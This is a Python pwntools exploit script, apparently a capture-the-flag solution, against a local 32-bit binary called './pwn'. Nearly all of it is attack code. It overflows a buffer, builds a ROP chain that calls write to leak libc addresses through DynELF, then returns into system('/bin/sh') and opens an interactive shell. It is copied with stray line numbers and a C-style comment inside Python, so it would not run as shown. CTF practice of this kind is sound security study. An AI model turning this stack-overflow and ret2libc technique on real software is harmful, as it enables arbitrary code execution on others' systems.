1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| from pwn import *
import string
import base64
import ctypes
import time
from LibcSearcher import *
elf = ELF('./pwn')
context.arch='i386'
context.terminal = ['gnome-terminal','-x','sh','-c']
context.log_level='debug'
p = process('./pwn')
payload ='\x00'*7+p16(0xE7)
p.send(payload)
func_addr = 0x80487d0
write_addr = 0x8048578
pppr_addr = 0x080488f9
write_symbol = 0x8049FEC
// 需要可持续性的泄露
def leak(addr):
payload = 'a'*0xeb+p32(write_addr)+p32(pppr_addr)+p32(1)+p32(addr)+p32(4)+p32(func_addr)+'a'*4+p32(0xE7)
p.send(payload)
res = p.recv()[:4]
return res
p.recvuntil('Correct\n')
d = DynELF(leak,elf=elf)
sys_addr = d.lookup('system','libc')
binsh = d.lookup('str_bin_sh','libc')
payload = 'a'*0xeb+p32(sys_addr)+p32(0)+p32(binsh)
info("sys_addr: 0x%08x,binsh: 0x%08x",sys_addr,p64(0))
p.sendline(payload)
p.interactive()
|